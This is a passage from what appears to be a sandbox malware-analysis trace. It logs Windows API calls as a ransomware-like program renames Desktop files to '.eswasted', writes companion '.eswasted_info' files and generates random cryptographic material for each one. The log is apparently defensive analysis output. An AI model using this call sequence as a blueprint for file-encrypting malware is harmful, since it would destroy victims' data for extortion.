HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\IZO9np.mkv") returned 74 [0073.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29e) returned 0x6f5cc0 [0073.651] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.651] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0073.651] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.689] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0073.689] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.689] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\IZO9np.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\izo9np.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0073.692] WriteFile (in: hFile=0x11c, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.693] SetEndOfFile (hFile=0x11c) returned 1 [0073.693] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.693] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.693] lstrcpyW (in: lpString1=0x6f5d54, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.693] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\IZO9np.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\izo9np.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\IZO9np.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\izo9np.mkv.eswasted")) returned 1 [0073.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\NIIZswuck\\IZO9np.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\niizswuck\\izo9np.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.697] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.699] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.700] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.700] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.700] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.701] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.701] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.712] SetEndOfFile (hFile=0x11c) returned 1 [0073.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.714] CloseHandle (hObject=0x11c) returned 1 [0073.716] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0073.716] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.717] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.717] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\odyCZw4uSwXQ1.avi") returned 71 [0073.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x298) returned 0x1412c98 [0073.717] lstrcpyW (in: lpString1=0x1412d26, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.718] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x717b00 [0073.718] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.719] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x717b00 | out: pbBuffer=0x717b00) returned 1 [0073.719] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\odyCZw4uSwXQ1.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\odyczw4uswxq1.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.777] WriteFile (in: hFile=0x124, lpBuffer=0x717b00*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x717b00*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.778] SetEndOfFile (hFile=0x124) returned 1 [0073.778] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.778] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0073.778] lstrcpyW (in: lpString1=0x1412d26, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.778] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\odyCZw4uSwXQ1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\odyczw4uswxq1.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\odyCZw4uSwXQ1.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\odyczw4uswxq1.avi.eswasted")) returned 1 [0073.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\odyCZw4uSwXQ1.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\odyczw4uswxq1.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0073.779] CreateFileMappingW (hFile=0x134, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0073.782] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.783] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.783] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.783] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.784] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.784] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.796] SetEndOfFile (hFile=0x124) returned 1 [0073.798] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.798] CloseHandle (hObject=0x124) returned 1 [0073.800] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412c98 | out: hHeap=0x6d0000) returned 1 [0073.800] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.801] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.801] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.801] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\QzXsG1Yaen9odjLG.ppt") returned 74 [0073.801] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x29e) returned 0x70c160 [0073.802] lstrcpyW (in: lpString1=0x70c1f4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.802] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.802] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.803] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.803] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.803] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\QzXsG1Yaen9odjLG.ppt.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\qzxsg1yaen9odjlg.ppt.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.803] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.804] SetEndOfFile (hFile=0x124) returned 1 [0073.805] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.805] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.805] lstrcpyW (in: lpString1=0x70c1f4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.805] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\QzXsG1Yaen9odjLG.ppt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\qzxsg1yaen9odjlg.ppt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\QzXsG1Yaen9odjLG.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\qzxsg1yaen9odjlg.ppt.eswasted")) returned 1 [0073.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\QzXsG1Yaen9odjLG.ppt.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\qzxsg1yaen9odjlg.ppt.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0073.806] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x134 [0073.808] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.809] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7112a8 | out: pbBuffer=0x7112a8) returned 1 [0073.809] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.809] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.810] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.810] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.821] SetEndOfFile (hFile=0x124) returned 1 [0073.870] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.870] CloseHandle (hObject=0x124) returned 1 [0073.875] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0073.876] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.877] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.877] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.877] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\AYAitI6ulwKkNQyfl2It.mp3") returned 98 [0073.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ce) returned 0x71c050 [0073.877] lstrcpyW (in: lpString1=0x71c114, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.877] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.877] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.878] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.878] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\AYAitI6ulwKkNQyfl2It.mp3.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\ayaiti6ulwkknqyfl2it.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.879] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.880] SetEndOfFile (hFile=0x124) returned 1 [0073.880] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.880] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.880] lstrcpyW (in: lpString1=0x71c114, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\AYAitI6ulwKkNQyfl2It.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\ayaiti6ulwkknqyfl2it.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\AYAitI6ulwKkNQyfl2It.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\ayaiti6ulwkknqyfl2it.mp3.eswasted")) returned 1 [0073.882] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\AYAitI6ulwKkNQyfl2It.mp3.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\ayaiti6ulwkknqyfl2it.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0073.882] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x108 [0073.884] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.886] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0073.886] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.886] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.887] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.887] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.897] SetEndOfFile (hFile=0x124) returned 1 [0073.900] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.900] CloseHandle (hObject=0x124) returned 1 [0073.902] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71c050 | out: hHeap=0x6d0000) returned 1 [0073.902] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0073.903] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0073.903] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.903] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\b8Jc-wtgQfc9eT9v.swf") returned 94 [0073.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c6) returned 0x6f5cc0 [0073.903] lstrcpyW (in: lpString1=0x6f5d7c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0073.903] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0073.903] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0073.904] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0073.904] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\b8Jc-wtgQfc9eT9v.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\b8jc-wtgqfc9et9v.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0073.905] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0073.906] SetEndOfFile (hFile=0x124) returned 1 [0073.906] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.906] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0073.906] lstrcpyW (in: lpString1=0x6f5d7c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0073.906] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\b8Jc-wtgQfc9eT9v.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\b8jc-wtgqfc9et9v.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\b8Jc-wtgQfc9eT9v.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\b8jc-wtgqfc9et9v.swf.eswasted")) returned 1 [0073.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VQrFqGOacmP\\T4mzOs6jEFTU8dFI_r0\\b8Jc-wtgQfc9eT9v.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vqrfqgoacmp\\t4mzos6jeftu8dfi_r0\\b8jc-wtgqfc9et9v.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0073.907] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0073.910] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0073.911] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0073.911] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.911] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0073.912] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0073.912] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0073.965] SetEndOfFile (hFile=0x124) returned 1 [0074.027] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x717b00 | out: hHeap=0x6d0000) returned 1 [0074.027] CloseHandle (hObject=0x124) returned 1 [0074.029] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f5cc0 | out: hHeap=0x6d0000) returned 1 [0074.029] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0074.030] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0074.030] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.030] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z88VY1b.gif") returned 53 [0074.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x274) returned 0x71aba0 [0074.030] lstrcpyW (in: lpString1=0x71ac0a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0074.030] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412248 [0074.030] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0074.031] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412248 | out: pbBuffer=0x1412248) returned 1 [0074.031] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0074.031] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z88VY1b.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z88vy1b.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0074.032] WriteFile (in: hFile=0x124, lpBuffer=0x1412248*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412248*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0074.034] SetEndOfFile (hFile=0x124) returned 1 [0074.034] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.034] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412248 | out: hHeap=0x6d0000) returned 1 [0074.034] lstrcpyW (in: lpString1=0x71ac0a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0074.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z88VY1b.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z88vy1b.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Z88VY1b.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\z88vy1b.gif.eswasted")) returned 1 [0074.047] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 